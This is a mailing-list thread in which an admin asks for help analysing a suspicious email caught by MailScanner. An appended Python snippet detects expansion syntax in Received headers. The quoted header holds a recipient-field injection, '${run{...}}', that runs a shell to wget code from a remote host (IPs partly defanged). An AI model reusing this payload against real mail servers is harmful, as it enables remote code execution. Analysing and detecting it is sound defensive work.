possible attack against MailScanner ?

Shawn Iverson iversons at rushville.k12.in.us
Mon Jul 15 11:15:46 UTC 2019


That is, unless it originated from somewhere else...

On Mon, Jul 15, 2019 at 7:15 AM Shawn Iverson <iversons at rushville.k12.in.us>
wrote:

> Is that the start of a cron script in the email address field?
>
> If so, you need to fix that.
>
> On Mon, Jul 15, 2019 at 6:59 AM Heino Backhaus <
> heino.backhaus at fink-computer.de> wrote:
>
>> Hello list,
>>
>> I need some help analysing the following email I received last week.
>>
>> Mailwatch Mail-Metadata:
>>
>> Received: from sab.com (unknown [46.22.132.94])
>>      by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
>>      for <root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*
>> x22}}@mailscanner.mydomain.local>; Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
>> Received: 1
>> Received: 2
>> Received: 3
>> Received: 4
>> Received: 5
>> Received: 6
>> Received: 7
>> Received: 8
>> Received: 9
>> Received: 10
>> Received: 11
>> Received: 12
>> Received: 13
>> Received: 14
>> Received: 15
>> Received: 16
>> Received: 17
>> Received: 18
>> Received: 19
>> Received: 20
>> Received: 21
>> Received: 22
>> Received: 23
>> Received: 24
>> Received: 25
>> Received: 26
>> Received: 27
>> Received: 28
>> Received: 29
>> Received: 30
>> Received: 31
>>
>>
>>
>> IP1: *199.204.214.40* changed to *1.2.3.4* to disarm this...just in
>> case...
>> IP2: *87.138.227.107* changed to *5.6.7.8* to disarm this...just in
>> case...
>>
>> Versions:
>> MailWatch Version: 1.2.9
>> OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
>> Postfix Version: 3.1.0
>> MailScanner Version: 5.1.2
>> ClamAV Version: 0.102.0-devel-20190715
>> SpamAssassin Version: 3.4.2
>> PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1
>> MySQL Version: 5.7.26-0ubuntu0.16.04.1
>>
>> Can you help me bring some light into this darkness...
>>
>> --
>> Kind regards
>>
>> H. Backhaus
>>
>> Fink-Computer Systeme
>> Heggrabenstr. 9, 35435 Wettenberg
>> Email: heino.backhaus at fink-computer.de
>> Web: www.fink-computer.de
>> Fax: +49-641-98444638
>> Fon: +49-641-98444640
>> UST-ID: DE151040770
>> HRB: 2143 Gießen
>> GF: Fredi Fink
>>
>> I was gratified to be able to answer promptly, and I did.
>> I said I didn't know.
>>  Mark Twain
>>
>
> --
> Shawn Iverson, CETL
> Director of Technology
> Rush County Schools
> 765-932-3901 option 7
> iversons at rushville.k12.in.us
>


-- 
Shawn Iverson, CETL
Director of Technology
Rush County Schools
765-932-3901 option 7
iversons at rushville.k12.in.us
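
An added example, not part of the original thread or of MailScanner's code: a Python check that unfolds `Received:` headers, extracts the `for <...>` recipient, and flags local parts carrying `${...}` expansion syntax (the `${run{...}}` form is Exim string-expansion syntax), along with bare-number filler `Received:` lines like those quoted above. The sample headers are constructed from the poster's already-defanged excerpt; the function names and the character allow-list are assumptions.

```python
import re

# Constructed sample based on the poster's already-defanged excerpt, plus one
# ordinary hop (mx.example.org and alice are made up for contrast).
SAMPLE_HEADERS = """\
Received: from sab.com (unknown [46.22.132.94])
     by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
     for <root+${run{x2fbinx2fsht-ctx22wgetx201.2.3.4x2fsbzx2f5.6.7.8x22}}@mailscanner.mydomain.local>; Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
Received: 1
Received: 2
Received: from mx.example.org (mx.example.org [192.0.2.10])
     by mailscanner.mydomain.local (Postfix) with ESMTP id A1B2C3D4E5
     for <alice@mailscanner.mydomain.local>; Thu, 11 Jul 2019 19:40:00 +0200 (CEST)
"""

FOR_CLAUSE = re.compile(r"\bfor\s+<([^>]*)>")
# Assumed allow-list, deliberately stricter than RFC 5322: no $, {, }, | or backtick.
SAFE_LOCAL = re.compile(r"^[A-Za-z0-9.!#%&'*+/=?^_~-]+$")

def unfold(raw):
    """Join folded header lines and return [name, value] pairs."""
    headers = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and headers:
            headers[-1][1] += " " + line.strip()
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append([name.strip().lower(), value.strip()])
    return headers

def check_local_part(address):
    """Return reasons the local part of a recipient looks like injected syntax."""
    local = address.rsplit("@", 1)[0]
    reasons = []
    if "${" in local:
        reasons.append("expansion-syntax")
    if not SAFE_LOCAL.match(local):
        reasons.append("unexpected-characters")
    return reasons

def analyse(raw):
    received = [v for n, v in unfold(raw) if n == "received"]
    flagged = {}
    for value in received:
        m = FOR_CLAUSE.search(value)
        if m and check_local_part(m.group(1)):
            flagged[m.group(1)] = check_local_part(m.group(1))
    filler = sum(1 for v in received if v.isdigit())  # e.g. "Received: 1"
    return {"flagged": flagged, "filler": filler, "total": len(received)}
```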
